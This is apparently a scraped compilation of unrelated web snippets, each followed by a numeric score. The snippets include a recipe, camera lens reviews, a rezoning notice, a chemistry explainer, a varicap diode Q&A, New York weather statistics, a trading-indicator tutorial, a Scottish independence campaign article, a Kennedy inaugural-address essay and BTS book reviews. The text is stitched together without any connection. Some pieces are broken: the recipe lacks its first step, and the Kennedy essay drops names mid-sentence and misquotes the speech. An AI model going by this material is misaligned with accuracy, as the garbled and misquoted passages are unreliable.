Spice up your chicken tenders. This is the best sauce I've ever found for them. Ever. 2. In a bowl, stir together paprika, salt, and pepper. Sprinkle seasoning over chicken pieces. Dip pieces in egg, then dredge in bread crumbs. 3. Bake in preheated oven for 15 minutes, turning once. 4. In a small saucepan over medium-low heat, stir together sugar, lemon juice, and curry powder, stirring until sugar dissolves, about 5 minutes. 5. Drizzle lemon sauce over chicken, return to oven, and bake 5 minutes more.
0.998693
Lens came without cap, but it's shown in the descriptions, I had to buy one. Item as described. Fast shipping. Recommended seller. I really like this lens, and have been recommending it to any friends I know who own a Nikon. For less than $200, this is a quality lens that takes pro-level photos - even in minimal light. Do yourself a favor and purchase one of these beauty's today and take your photography to the next level. Things I enjoy about the lens: - I get fantastic quality in every photo - It's lightweight and hardly takes any room in my camera case - Can drop it down to f/1.8, which is fantastic for low-light and helps get that nice blurred background you've been wanting - Made by Nikon - It works on both FX and DX camera bodies - It's less than $200 - Versatile/staple lens for many situations Things that could be seen as cons: - It's a "prime" lens, so 50mm is what you get (but, makes it simple) - The Autofocus does not work on DX camera bodies below the 7000 series (though the manual focus is easy to use) Overall: - Buy this lens - you won't regret your decision at all. I ran across this Nikkor lens while shopping for the 1.4 to use for my daughter's video project with my Canon 5DMII. It was such a bargain and the reviews so positive that I purchased the lens and love it. Mounted on the Canon 5DMII, the camera becomes unobtrusive and better than the huge 24-70 mm zoom when out and about for street photos. The 1.8 is plenty fast compared to the f 2.8 on the 24-70 mm zoom with the Canon 5DMII. I later acquired the 1.4 and I find the images taken with the 1.8 Series E to be almost indistinguishable. Of course, the same advantages and limitations reported in my review of the 1.4 lens apply - shallow depth of field when shooting wide open, probably not as sharp as the Canon version of this lens, manual focus can slow you down but manually adjustable aperture, much faster and nonetheless beautiful images for the price of a Canon lens.
0.981184
Planned Development Rezoning from the R-2 Two-Family Residence Zoning District and the CO Commercial Office Zoning District to R-M(PD) Planned Development Zoning District to allow a new seven story mixed-use building with up to 241 residential units and approximately 1,300 square feet of commercial space and approximately 1.28-gross acre site. More Information: Use https://sjpermits.org/permits/ and search by Permit, Property or Zoning Information. Type in the permit/reference number PDC18-016. . Please include the project file number (PDC18-016) in the subject line of your email. A community meeting and public hearing has not yet been scheduled for this project. If you would like to receive the community meeting notice and public hearing notice when the meetings are scheduled, please email the planning staff contact with the file number in the subject line of the email. In the body of the email, please include your full name and mailing address. Alternate languages may be selected through Google Translate option located in the bottom left corner of this webpage. If you have additional questions regarding this project and need a translator, please contact the appropriate translator noted below. Spanish: Para información en español acerca de esta solicitud, comuníquese con Jennifer Provedor al 408-793-4100, e índique el número de Proyecto PDC18-016. Vietnamese: To speak with a Vietnamese translator, please contact Kieulan Pham at 408-793-4305 and mention the following project number: PDC18-016.
0.99998
Colligative properties are properties of solutions that depend on the number of particles in a volume of solvent (the concentration) and not on the mass or identity of the solute particles. Colligative properties are also affected by temperature. Calculation of the properties only works perfectly for ideal solutions. In practice, this means the equations for colligative properties should only be applied to dilute real solutions when a nonvolatile solute is dissolved in a volatile liquid solvent. For any given solute to solvent mass ratio, any colligative property is inversely proportional to the molar mass of the solute. The word "colligative" comes from the Latin word colligatus, which means "bound together", referring to how the properties of a solvent are bound to the concentration of solute in a solution. When a solute is added to a solvent to make a solution, the dissolved particles displace some of the solvent in the liquid phase. This reduces the concentration of the solvent per unit of volume. In a dilute solution, it doesn't matter what the particles are, just how many of them are present. So, for example, dissolving CaCl2 completely would yield three particles (one calcium ion and two chloride ions), while dissolving NaCl would only produce two particles (a sodium ion and a chloride ion). The calcium chloride would have a greater effect on colligative properties than the table salt. This is why calcium chloride is a more effective de-icing agent at lower temperatures than ordinary salt. What Are the Colligative Properties? Examples of colligative properties include vapor pressure lowering, freezing point depression, osmotic pressure, and boiling point elevation. For example, adding a pinch of salt to a cup of water makes the water freeze at a lower temperature than it normally would, boil at a higher temperature, have a lower vapor pressure, and changes its osmotic pressure. While colligative properties are generally considered for nonvolatile solutes, the effect also applies to volatile solutes (although it may be harder to calculate). For example, adding alcohol (a volatile liquid) to water lowers the freezing point below that ordinarily seen for either pure alcohol or pure water. This is why alcoholic beverages tend not to freeze in a home freezer. Colligative properties depend only on solute concentration and temperature, not on the nature of the solute particles. Constitutional properties depend on the molecular structure of the solute particles in a solution. Additive properties are the sum of all the properties of the particles. Additive properties are dependent on the molecular formula of the solute. An example of an additive property is mass.
0.999997
How to properly connect and drive varicap diodes? can someone explain me how to connect and use varicap diodes? Please consider that I am a novice, so would be ok to use a clear and an exhaustive language/terms. Thank you. The first thing is: from what I heard, a resistor between the V tuning and the varicap is needed to remove the DC signal, or is also possible to insert an inductor or a capacitor; which component is better to choose and of what value? And if I avoid to insert the resistor/inductor/capacitor in what "risks" I can fall? The schematic also shows that is possible to connect these varicap in a back-to-back configuration (anode to anode): in this way the total capacitance is the half of one diode. But I have a doubt: in this schematic (bottom left image) the varicaps are DC shorted by the inductor, right? Why aren't DC isolated from the circuit? So, is better to prefer the schematic in the top right image? Seems that here, the capacitors are used to isolate the varicaps. But from what I can see, in a lot of schematics, varicaps aren't isolated from the circuit. Is not very clear to me. I can also see that is possible to connect them with the cathode in common: which configuration is better? Can someone explain me which connection is preferable and why (anode to anode, cathode to cathode or just with a capacitor in series - and how to choose the series capacitor to avoid to reduce the capacitance range of the varicap), how to properly isolate them from the DC signal and from the circuit? Would be also nice to see some practical/didactic schematic (with component value) to exactly show and understand howa circuit can operate. Image (a) - That capacitor above the varicap isolates the tuned circuit from the DC tuning voltage, but still allows the capacitance of the varicap to contribute to frequency modulation since it's still a part of the tuned circuit. Image (b) - If you replace the capacitor above it with another varicap, as shown on the right, not only are you able to tune both at once with the same tuning voltage, but inherently the tuning voltage is isolated from the tuned circuit, without the need to add the big capacitor to block it, and thus you only have the capacitance of those varicaps in combination to add to your circuit. For example, I want to tune a circuit that normally operates at 100kHz from 100-120kHz. I can use the big capacitor to define the 'start point' of 100kHz and also block my tuning voltage. Then the varicap's additional capacitance in series lets me maneuver from 100 to 105 to 110 to 115 to 120kHz. BEWARE: Two back to back varicaps (V1 + V2) gives you \$1\over2\$ capacitance, so just V1. In this example, I want to tune a circuit from scratch to operate at 0-500kHz. In order to get that full range of frequencies, I use two varicaps back-to-back in order to avoid having to set a 'start point' frequency, and then I use the DC voltage to change both of their values at once. Also, this allows you to work with higher voltage waves, just in case the AC signal is enough to reverse bias your varicap and mess everything up. Remember, tuned circuits aren't meant to operate with DC, they operate with AC, either V+ to V-, or V+ to 0, or 0 to V-. Also; in regards to the resistor or inductor on the biasing input, you'll need something that impedes it enough to not affect your tuned circuit, but doesn't impede it so much that you drop voltage all the way to 0V and basically do nothing. It all depends on how fast you want your circuit to go. At lower frequencies you can get away with just letting the caps do their thing. At higher frequencies, a high-value resistor or inductor will do. Prefer the (a) connection when you want to have a heavier effect on a frequency, or when you must operate above a certain frequency by a certain amount with your bias input. Prefer the (b) connection when you must operate within the entire frequency range with your bias input. The DC and AC never interact to any reasonable level. In the bottom left image, the DC is blocked by the blocking capacitor which has no identification. It is typically selected to be a value that has essentially no effect on the tuned circuit. On the right hand schematic, both diodes are reverse biased, so again, no DC is flowing in the inductor. Generally, for creating tuning circuits the figure (b) is preferred, as strong, nearby signals will cancel out on the pair of varactors. Usually, the bias resistor for the varactors is up in the megohms, not 10-48K as indicated; at least in all of the RF circuits I have played with. And, as for capacitance, you need to look at the manufacturers sheet for your various diodes to see how much capacitance can be generated by what bias voltage range. The typical range for varactor tuning diodes is about 1 to about 50 pF maximum. It is generally easier to put several stacks (as in b) in parallel to develop higher capacitance. >"in (bottom left image) the varicaps are DC shorted by the inductor, right?" The inductor resonates with the capacitance of two varicaps in series, i.e. half the capacitance of one varicap. Note that the D.C. control input must be negative to keep the varicaps reverse biased. For a positive D.C. control input, connect the pair of varicaps cathode to cathode instead. >"is better to prefer the schematic in the top right image?" No, assuming the two unlabelled capacitors are large compared to the varicaps this circuit works just the same. Be aware of the formula for the capacitance of two capacitors in series: Ctotal = C1 x C2 / (C1 + C2). Not the answer you're looking for? Browse other questions tagged diodes capacitance tuner or ask your own question. Will a diode conduct if one side is floating and one side has voltage applied to it? Which diode is conducting and what are the operation points of the conducting diode? Can you smooth a stepper motor with diodes?
0.959659
Nature's Candy e-commerce retailer business plan company summary. Nature's Candy is an E-commerce retailer of naturopathic and homeopathic nutritional supplements. Nature's Candy's goal is to become the e-commerce market leader in sales and marketing of naturopathic and homeopathic dietary supplements. Legal fees for the business formation. Shelving units for inventory storage. Computer system with Microsoft Office, QuickBooks Pro, CD-RW, printer, and a broadband Internet connection. Nature's Candy is a privately held Oregon corporation. Quack Vendor will be the majority owner. The company intends to recruit a sophisticated team of owner board members. The board members will be granted shares of stock to provide an incentive for their performance on the board.
0.952877
Daily high temperatures increase by 9°F, from 46°F to 55°F, rarely falling below 34°F or exceeding 68°F. Daily low temperatures increase by 8°F, from 33°F to 41°F, rarely falling below 21°F or exceeding 50°F. For reference, on July 21, the hottest day of the year, temperatures in New York City typically range from 71°F to 85°F, while on January 29, the coldest day of the year, they range from 28°F to 39°F. Gedzhukh, Russia (5,672 miles away) and Yatsuomachi-higashikumisaka, Japan (6,752 miles) are the far-away foreign places with temperatures most similar to New York City (view comparison). The month of March in New York City experiences essentially constant cloud cover, with the percentage of time that the sky is overcast or mostly cloudy remaining about 51% throughout the month. For reference, on January 3, the cloudiest day of the year, the chance of overcast or mostly cloudy conditions is 53%, while on August 29, the clearest day of the year, the chance of clear, mostly clear, or partly cloudy skies is 64%. A wet day is one with at least 0.04 inches of liquid or liquid-equivalent precipitation. In New York City, the chance of a wet day over the course of March is gradually increasing, starting the month at 26% and ending it at 29%. For reference, the year's highest daily chance of a wet day is 35% on August 1, and its lowest chance is 22% on January 28. Over the course of March in New York City, the chance of a day with only rain increases from 19% to 27%, the chance of a day with mixed snow and rain decreases from 5% to 1%, and the chance of a day with only snow remains an essentially constant 1% throughout. The average sliding 31-day rainfall during March in New York City is rapidly increasing, starting the month at 2.6 inches, when it rarely exceeds 4.9 inches or falls below 1.0 inches, and ending the month at 3.7 inches, when it rarely exceeds 6.5 inches or falls below 1.4 inches. The average sliding 31-day liquid-equivalent snowfall during March in New York City is gradually decreasing, starting the month at 0.5 inches, when it rarely exceeds 1.6 inches, and ending the month at 0.1 inches, when it rarely exceeds 0.4 inches. Over the course of March in New York City, the length of the day is rapidly increasing. From the start to the end of the month, the length of the day increases by 1 hour, 21 minutes, implying an average daily increase of 2 minutes, 43 seconds, and weekly increase of 18 minutes, 58 seconds. The earliest sunrise of the month in New York City is 6:17 AM on March 9 and the latest sunrise is 58 minutes later at 7:16 AM on March 10. The earliest sunset is 5:46 PM on March 1 and the latest sunset is 1 hour, 33 minutes later at 7:19 PM on March 31. For reference, on June 21, the longest day of the year, the Sun rises at 5:24 AM and sets 15 hours, 6 minutes later, at 8:30 PM, while on December 22, the shortest day of the year, it rises at 7:16 AM and sets 9 hours, 15 minutes later, at 4:32 PM. The chance that a given day will be muggy in New York City is essentially constant during March, remaining around 0% throughout. For reference, on August 2, the muggiest day of the year, there are muggy conditions 54% of the time, while on December 15, the least muggy day of the year, there are muggy conditions 0% of the time. The average hourly wind speed in New York City is gradually decreasing during March, decreasing from 10.2 miles per hour to 9.3 miles per hour over the course of the month. For reference, on February 26, the windiest day of the year, the daily average wind speed is 10.3 miles per hour, while on August 1, the calmest day of the year, the daily average wind speed is 6.2 miles per hour. The wind direction in New York City during March is predominantly out of the west from March 1 to March 14 and from March 21 to March 31 and the north from March 14 to March 21. New York City is located near a large body of water (e.g., ocean, sea, or large lake). This section reports on the wide-area average surface temperature of that water. The average surface water temperature in New York City is gradually increasing during March, rising by 3°F, from 39°F to 42°F, over the course of the month. The growing season in New York City typically lasts for 7.8 months (238 days), from around March 29 to around November 22, rarely starting before March 12 or after April 14, and rarely ending before November 4 or after December 13. During March in New York City, the chance that a given day is within the growing season is very rapidly increasing rising from 0% to 57% over the course of the month. The average accumulated growing degree days in New York City are gradually increasing during March, increasing by 43°F, from 17°F to 59°F, over the course of the month. The average daily incident shortwave solar energy in New York City is increasing during March, rising by 1.2 kWh, from 3.4 kWh to 4.7 kWh, over the course of the month. For the purposes of this report, the geographical coordinates of New York City are 40.714 deg latitude, -74.006 deg longitude, and 7 ft elevation. The topography within 2 miles of New York City is essentially flat, with a maximum elevation change of 85 feet and an average elevation above sea level of 11 feet. Within 10 miles is essentially flat (367 feet). Within 50 miles contains only modest variations in elevation (1,657 feet). The area within 2 miles of New York City is covered by water (58%) and artificial surfaces (40%), within 10 miles by artificial surfaces (78%) and water (20%), and within 50 miles by artificial surfaces (32%) and trees (32%). This report illustrates the typical weather in New York City year round, based on a statistical analysis of historical hourly weather reports and model reconstructions from January 1, 1980 to December 31, 2016. There are 3 weather stations near enough to contribute to our estimation of the temperature and dew point in New York City. For each station, the records are corrected for the elevation difference between that station and New York City according to the International Standard Atmosphere , and by the relative change present in the MERRA-2 satellite-era reanalysis between the two locations. The estimated value at New York City is computed as the weighted average of the individual contributions from each station, with weights proportional to the inverse of the distance between New York City and a given station. The stations contributing to this reconstruction are: New York City, Central Park (57%, 8 kilometers, northeast); Newark Liberty International Airport (29%, 14 kilometers, west); and John F. Kennedy International Airport (15%, 22 kilometers, east).
0.971069
I need to write a paper on The Meaning of Life. I am not looking for someone to write it for me. I need to put this into a presentation and am working with another person. I am hoping for some guidance. I can write, but struggle with the concept. Thank you. "Similar to excellent written work, this presentation should incorporate at least five direct text/theory references or researched arguments, offer a number of strong examples and analysis, and support such work with a number of comprehensive and thorough insights from personal experience or one's own work." Q: True or False: Pierre Hadot thought philosophy was important, but in conflict with the real world. Q: How did World War 2 affect the way Sartre viewed humanity and civilization?
0.999493
Pragmatic entrepreneurs and institutionalized scholars? On the path-dependent nature of entrepreneurship scholarship. In Chapter 3, entitled "Pragmatic entrepreneurs and institutionalized scholars? On the path-dependent nature of entrepreneurship scholarship", Henrik Berglund and Karl Wennberg start with the question: The essence of entrepreneurship is being different. If this is the case, why does so much of entrepreneurship research seem to be so very similar? They argue that the increased maturation and institutionalization of entrepreneurship as a scholarly field have led to greater influence from established research fields such as strategic management and organization theory, and as a consequence, an increased 'taking-for-grantedness' of research questions, unit of analysis and research designs. Thus, much entrepreneurship research becomes fairly narrow in focus and echoes mainstream disciplines. Taking inspiration from real-world entrepreneurs and the philosophical tradition of pragmatism, the authors provide some suggestions for entrepreneurship research: * Entrepreneurship scholars need to pay more attention to the fundamental nature of entrepreneurship and practicing entrepreneurs. * Entrepreneurs are pragmatic individuals and in the same way as real-world entrepreneurs, entrepreneurship scholars need to adopt a 'down to earth', actionable and pluralistic view of entrepreneurship. * This pragmatic view of entrepreneurship calls for epistemological inspiration from pragmatic philosophy, theoretical inspiration from disciplines other than strategic management and organization theory, as well as methodological inspiration from a wide range of traditions.
0.999999
What do indicators look like? Leading indicators measure the rate of change in the price action and can register when the price action is slowing down or speeding up. Leading indicators can provide signals ahead of time, while lagging indicators are generally used to confirm the price action, such as the strength of a trend. For example, if the price action has rapidly risen and then begins to slow, a leading indicator can register this change in momentum and hence provide a signal that the asset may be due for a reversal. A lagging indicator is generally used to confirm what the price action has done, such as whether the price action has entered into a trend and the strength of that trend. They are called lagging indicators because they lag behind the price action. The trend on a chart, as well as its strength, is not always obvious and a trending indicator can make this clearer. Trending indicators tend to be lagging in nature. Trending indicators tend to be lagging in nature and are used to identify the strength of a trend, and help find entries and exits in and out of the market. When the price is moving in a range, an oscillating indicator helps to determine the upper and lower boundaries of that range by showing whether something is overbought or oversold. They do this by oscillating between an upper level and a lower level. Oscillating indicators tend to be leading in nature. Oscillating indicators are used in a range, tend to be leading in nature, and determine whether the asset is overbought or oversold. If an oscillating indicator signals that an instrument is overbought, a trader will be likely to look for short positions. Likewise, if an oscillating indicator signals that an instrument is oversold, a trader will likely looks for long positions. The type of indicators being used depends on the trading system, and ultimately comes down to the preference of the trader. The type of indicator you use is up to the trader's preference; however oscillating indicators are useful in ranging markets, while trending indicators are useful in trending markets. For example, if you prefer to trade in ranging markets, then oscillating indicators, such as the stochastic, commodity channel index or the relative strength index, will be useful to help make trading decisions. If you prefer to trade in a trending market, then trending indicators, such as the MACD or average directional index, will be more useful. Combining trending and oscillating indicators to use in different market conditions is beneficial. Market conditions continually change from ranging to trending and back again, and so you can use each indicator according to its strength. Once it becomes clear how useful indicators can be, there can be a tendency to use too many indicators on one chart. For example, if a trader has added three oscillating indicators below a chart, then there are three indicators providing the same information. Adding more indicators that supply the same information to a chart will not make them more reliable. They simply show the same overbought and oversold information in different ways, and only take up more space on your chart. ... indicators can be displayed either on the price chart itself, or below in a separate area. ... there are many types of indicators, each with their own purpose and benefit. ... a lagging indicator will confirm the market conditions, whereas a leading indicator can provide trading signals for future price action. ... trending indicators can help determine whether the market has entered into a trend and the strength of that trend. ... oscillating/ranging indicators can help determine when the market is overbought or oversold when the market is ranging. ... indicators can be combined and so that they can be used over different market conditions. ... combining indicators of the same type is ineffective, because they in essence show the same information. ... you should not overload your charts, because too many indicators can give you conflicting signals.
0.999688
"Giving top priority to the bottom line vitiates quality." My aim is that the customer's expectations are met or exceeded in all points, not only in technical aspects, but also in relationship aspects. This is a short questionnaire to help you determine if you and On The Rock might be a good match. Please think carefully about the following questions and write down a "yes" or "no" answer for each. 1. Must you have a fixed quote from me in order for me to work for you? 2. Do you need a licensed contractor to work for you? 3. Is spending the least amount of money your highest priority? 4. Have all or most of your home repair/remodeling projects gone without glitches (whether done by you or someone else)? 5. Do you plan on hiring me without thoroughly reviewing this website? If you answered "yes" to either or both of the first two questions, then I thank you for giving your time thus far, but I will waste no more of it: Honestly, you will be better served by another handyman or handyman company besides me. If you answered "yes" to the last three questions, then you probably will be better served by another handyman besides me. Although it is possible to be a good match after having hired On The Rock (even though you answered "yes" to the last three questions), I do not recommend you take the risk unless you have a way to reduce or eliminate that risk (i.e., someone you know and trust referred you to me). The more "noes" you have for the last three questions, the more likely we will be a good match. If you answered "no" to the last three questions, please review the website at your leisure, then contact me if and when you are ready. I look forward to hearing from you!
0.993165
Considering where we are on this road to independence, the most difficult task we currently face is not winning a referendum but getting the chance to win one. Theresa May has infamously told us, and continues to tell us, ‘now is not the time’. So when is? If we want this dancing queen to start moving to our tune, we need to have enough people playing it. We need to give Nicola Sturgeon a (democratic) hammer from the Scots with which to tell Theresa ‘now is the time’. So how do we do this? The research sponsored by the Scottish Independence Convention (SIC) presented at last year’s Build conference concluded ‘If the Scottish independence movement wants to get to where it wants to go, it must know where it is now and what the path to success looks like.’ That holds true today and will hold true until just after the polls close on our final, successful, referendum. The SIC is made up of Scotland’s national independence supporting groups (plus many more local ones represented via regional forums), as well the main independence supporting political parties. The SIC has, as part of its work preparing for the next referendum, continued to sponsor voter research. The focus of this has been on developing an ever-deeper understanding of where the voters are on their path to Yes and critically, how can we help voters along it? In the last year, we have conducted research to develop profiles of important voter groups- those who intend to vote for independence, those who intend to vote against, and more importantly, those who say they currently don’t know. Another vital group we have been trying to understand are those who have swapped sides since last time. We have also begun testing what types of message (and message structures) best persuade the Don’t Knows, the soft No’s and those who have swapped sides, to change their minds, or at the very least, what encourages them to reconsider independence. For what comes next in this article, it is vital to understand that whilst we recently conducted a survey of 1500 people weighted to represent the Scottish population, it was not designed to be an opinion poll. Such polls, conducted by companies like YouGov or Survation, aim to accurately measure voting intentions across the population and to highlight differences between groups (typically based on age, gender, occupation or geography). Instead, our aim was to examine if and why people have changed sides and what types of independence supporting messages create positive emotions, change people’s minds and influence their voting intentions. Whilst our research is able to give a good picture of how Scotland intends to vote, it gives a laser sharp picture of whose voting intentions are changing and how they can be influenced. It is also research which a national campaign organisation, such as the one proposed by SIC, can use to help set the agenda, change the story and get people to look again at independence. Considering this wider purpose, please forgive us if we don’t tell you all the exact details – our opponents are reading this too! So in the year since the update given at the ‘Build’ conference, where are the voters now on their journey, and what does the path to success look like? By asking people how they voted last time and their intentions in the future, we find strong movement toward Yes with the largest movement seen in women under 34. More women now support Yes than No, though overall a majority do not yet support independence. This is because of the high number of women stating they don’t know how they’d vote. Encouraging certainly, but much is still to do in order persuade the Don’t knows and turn the Yes’s into actual votes. Our support still drops off in the older age categories, but now more voters up to the age of 55 support independence than are against it. A majority of voters interviewed want a referendum before the 2021 Scottish elections, including a clear majority of Don’t Knows. We find strong movement toward Yes when we ask people how they voted last time and their future intentions. This movement is most marked in women under the age of 44. Brexit is starting to have an effect, particularly in the young and particularly in young women, with women under 34 saying it is having the strongest effect on their intention to vote for independence. The Don’t Knows look more like Yes supporters than No supporters, both in terms of their age, gender and occupation but also in their psychological make up, such as how confident they are in Scotland’s ability to solve the challenges independence will bring. We now know the types of message that persuade ‘don’t knows’ to re-engage with the arguments for Independence and that persuade them to change their minds. Why? Well a year ago our participants told us that Brexit wasn’t having an effect but expected it would. We are now seeing its effect, and again this is strongest in younger women (under 34). It is also pulling women aged between 35 and 54, and men up to the age of 64, towards independence. It is vital we find out exactly why Brexit is having this effect on younger women and discover the deeper reasons behind their journeys to Yes. It is also having a strong effect on voters in high managerial/ professional occupations and those who are unemployed. Brexit is moving both these groups toward independence, though the former are not there yet. Just as some folks have moved toward Yes, some have moved away. When we examined where they moved to, we found that more moved to don’t know, than to No. However, the same is not true for our opponents who lost more of their voters to Yes than to Don’t Know. Those who couldn’t vote last time are coming to us 2:1. When you compare the demographics (age, gender, occupation) of current Yes, No and Don’t Knows, the Don’t Knows look more like independence supporters than they do No supporters. We also profiled voters on their psychological make-up, such as their attitude to risk and how good they think they are – and how good they think the people living in Scotland are – at solving problems. Proponents of independence are canny about taking risks and can be classified as ‘risk averse’. No supporters, however, have significantly higher levels of risk aversion. Our supporters have more confidence in themselves, and us as a collective, to solve the problems independence will bring. When we look at Don’t Knows on these measures, they are also psychologically more like independence supporters than No supporters. A year ago, people were not ready to listen again. Very little had been done actively at a national level in Scotland to change minds, and life after 9 years of Tory austerity was (and is) hard. People were left with little energy for politics and referenda as neither seemed to solve anything. Now some are ready to listen, enough in fact, to take us from borderline 50% to comfortably above. So rather than just relying on Theresa May and Brexit to move people towards support for independence, what can we do? Instead of testing finished messages designed to persuade different groups, we primarily tested different forms of message. We tested the type of hope they should portray and whether there should be an element of fear? Should we be explicit or just imply the benefits independence can, will or may (we tested these words too) bring? We found very strong, nearly off-the-charts, results for a particular type of message and message structure (i.e. the way it was worded and what it focused on) that made Don’t Knows feel hope and made them more likely to change their minds about voting for independence. It is a message structure that is positive, confident without being over confident, and has a wee touch of steel in it. Crucially, we also asked respondents if the messages shown to them led them to reconsider arguments for independence. The message structure for achieving this is the same as the message structure motivating people to vote Yes. But the focus of the messages is very different. The message leading people to reconsider independence most effectively, promoted the idea that Scotland ‘needs its own currency to truly control its economy’. We have to be careful about repeating messages that Don’t Knows did not engage with last time. They want something more concrete with specific examples. The responses to messages on the economy suggests they are interested in listening to our alternative progressive view. Perhaps Brexit has finally shown that the UK cannot be trusted to run our economy, if we want an economy that focuses on the wellbeing of all of us? From this, we know we have a very good idea about what types of messages people find more hopeful, which format they like more, agree with more and which general topics have more impact. It also highlights that people at different points of their journey need to be spoken to differently and about different issues. So then, where are we now? More women have joined us, younger women in particular. Our movement is still oriented to the younger than those over 65 and contains voters who are more hopeful, and more confident in the abilities of people who live in Scotland. Brexit is now having an effect. Don’t Knows look more like us both in terms of their demographic and psychological profile, and we’ve lost more to this group than we did to No. We need to keep working to understand how to help this group join us again. There are the 30% of British Nationalists who will just sap our energy if we try to change their minds. Let’s just smile, remind them that we are all Jock Tamson’s bairn’s and move on. We need to ensure we are not complacent about those whose jobs put them in the ‘semi-skilled’ and ‘skilled manual’ workers’ categories. People here still support us more than No, but a relatively high number of these folk say they don’t know how they will vote. We also need to do more in the ‘lower supervisor, administrative and professional’ category – again, many don’t know how they’d vote. The retired are still not coming to us. To continue to understand where we are heading, we need to continue this research work; delving deeper and exploring more why women are coming to us. And we need to sharpen further the types of messages and their specific context. We need to stay alert to detect if the Brexit effect starts to taper off and people get used to the idea. So Mrs May, even with the chaos your party is creating over Brexit, now still isn’t the time, but it is coming soon. With every shambolic headline undermining Brand Britain and the belief that it represents a strong and stable economy, it is getting closer. Our movement is getting larger and now we know even more about how to encourage people to join us. The Scottish Independence Convention believes now is the time for a national campaign group. One that can hone our understanding further and is able to help build our movement even further. So when Nicola next goes to see Theresa May, our voice cannot be ignored because it represents the will of the clear majority of the Scottish people.
0.937809
Sinatra recruited many Hollywood stars who performed and attended, and went as far as convincing to suspend their shows for the night to accommodate some of their actors attending the gala. Kennedy highlights the newly discovered dangers of nuclear power coupled with the accelerating , and essentially makes the main point that this focus on pure firepower should be replaced with a focus on maintenance of international relations and helping the impoverished in the world. Kennedy aims for his speech to be used as a call to duty to unite all of his listeners. Finally, to those nations who made themselves our adversaries, we offer not a pledge, but a request. Mirroring the Electoral College system allows for states to retain their own identity, while scheduling stops larger states. President Kennedy states this in the first sentence of his speech, which fortifies the idea of freedom and what needs to be done in order to attain it. Performances and speeches included , , , , , , , , , , , and Sinatra himself. Kennedy as he prepared for his own inauguration on January 20, 1961. He makes it clear that his aim is to work with adversaries towards the betterment of society. And in both, due to the Cold War, he is extremely intent on bringing liberty to the world around us much more than protecting the liberties we already have. The Space Race and the nuclear arms race were in full swing, and many Americans were worried the Soviets were winning. The belief that the rights of man come not from generosity, but of the state, but from the hand of God. Kennedy was the first, and to this date, the only Catholic inaugurated as commander-in-chief. Americans believed that Kennedy could relieve them of such worries and elected him as the president. As any President would he told the public that he would change many things that are wrong with the U. It provides a strong appeal to pathos, ethos and logos, and it is because of this that people who never heard the speech can quote lines from it. United States District Court, District of Columbia. Kennedy 's Inaugural Speech The inaugural address of John F. Kennedy then made several drafts using his own thoughts and some of those suggestions. He also phrases negative ideas in a manner so as to present them as opportunities — a challenge, appealing to innately American ideals. His use of logos, ethos, and pathos makes it an incredible piece of writing. John Fitzgerald Kennedy was sworn into office on January 20, 1961 at the age of 43. The cold war between the Soviet Union and the America became a concern among many Americans. Kennedy was sworn into office. Although his tone and purpose were different for each of his inaugural addresses, both conveyed similar ideas and used similar rhetorical devices. His speech was around a period when the Soviet Union had just gained power. So let us begin anew, remembering on both sides, that civility is not a sign of weakness, and sincerity is always—and I repeat always— a subject to proof. For we dare not meet a powerful challenge at the odds and split asunder. Together let us explore the stars, conquer the deserts, eradicate disease, tap ocean depths, and encourage the arts and commerce. You were able to tackle all the main points of rhetoric and did so with great writing! Antony disguises his true intents in his speech, putting him at a moral high ground over Brutus. The speech emphasized freedom and the duties freedom carried with it. The inaugural address was written to encourage the to get actively involved with their country. When Frost started reading, he stumbled on the first three lines, squinting at his papers in view of the crowd and cameras. Mr Obama also favours three-part lists, of which there were 29 in his 10-minute election victory speech in Chicago. He addresses the audience with a speech that would be remembered for years to come, as its call to duty is a powerful one. While America struggled with the ever-present threat of nuclear war, this other kind of conflict threatened to undermine and demoralize America from within. His 1366-word inaugural address, the first delivered to a televised audience in color, is considered among the best presidential inaugural speeches in American history. Two of his most famous speeches came during his two inaugural addresses when he became president. S citizens—that his newly-seized position as the U. Kennedy took office following the November 1960 , in which he narrowly defeated , the then— Vice President. This tone helps him to achieve his purpose, which is to persuade southerners not to secede from union and to reassure them that he will not take slavery away from them. The oath of office for Vice President was administered by the to Lyndon Johnson. This supports other view points. We are all descendants or supporters of the brave patriots who fought in the revolutionary war to stand for these same principles, and by referencing this shared heritage, Kennedy is able to further unite the American people. The inaugural address is saturated with rhetorical strategies seeking to flatter the American People and utilizes words of encouragement to evoke Kennedy emphasizes his argument for patriotic unification by effectively using anaphora to break his pledges and propositions into segments. He always talked about God which gives him ethos. Kennedy pledges that the United States will unify with other countries even if their viewpoints are much different than those of our great country. That the word go forth that this time and place, to friend and foe alike, that the torch has been passed to a new generation of Americans. Audience analysis He had delegated his aide Ted Sorensen to read all the previous presidential inaugurals, with the additional brief of trying to crack the code that had made Abraham Lincoln's Gettysburg address such a hit.
0.981006
Seven good-looking boys - RM, Jin, Suga, J-Hope, Jimin, V and Jungkook - who can dance as well as they can rap and sing, are tearing up the global music charts. Nothing new? Think again. BTS, who rose to fame in their native South Korea in 2013 and who sing almost entirely in Korean, are now a sensation in the US, the UK and the rest of the world. After working as a copywriter at the BBC, Adrian Besley became a freelance writer. He has written many successful non-fiction titles, including the recent official Monty Python Hidden Secrets, which told the story of Monty Python through artefacts from the archives; boy band biography 5 Seconds of Summer Confidential; a series of top-selling YouTube books such as YouTube World Records; and various humour titles such as The Retrosexual Manual (which made Amazon’s top 100 best sellers), The Dangerous Book for Idiots and How to Fart at School. 3.0 out of 5 starsGood for broad positive intro material, but not for depth. This book is young-level reading material, say middle to high schoolish. The author writes lots of trivia-like detail, and I did learn some things, but overall it whitewashes the harsher aspects of BTS's journey, saying things like the boys were criticized for certain things, or they had a hard time, but it doesn't explain how or go into any analytical depth about these events. So those looking for in-depth research and the boys' responses about what actually happened will be frustrated by this book. Also some ideas are unresearched and thus incorrect. For instance, in regard to fans' tweeting "ThankYouJimin" in early 2018, the author only says it was random, not that it was in response to him being mass criticized by antis and that fans were trying to make him feel better by saying, Thank you, a phrase Jimin is known for often saying to his fans. So I wonder what else was incorrect or incomplete that I don't know about. Also, I'd bet $100 the author is a V stan, which makes the book feel unprofessional since there's a sense of bias in it. Typos abound, especially as the book goes on. The author also often uses amateurish words as well, like once when referring to their creative content, s/he uses the word "stuff," so this book can feel fairly amateurishly written. To sum up, I might buy this book for a young BTS fan who wants to know more about them from a general, positive viewpoint with a light touch. I'm still waiting, though, for that brutally honest, in-depth BTS biography that I can really sink my teeth into. This took a very long time to arrive however it came in perfect condition and the pages with pictures are nice to look at. The book is written simply so that it's easy to understand for more ages.
0.999985
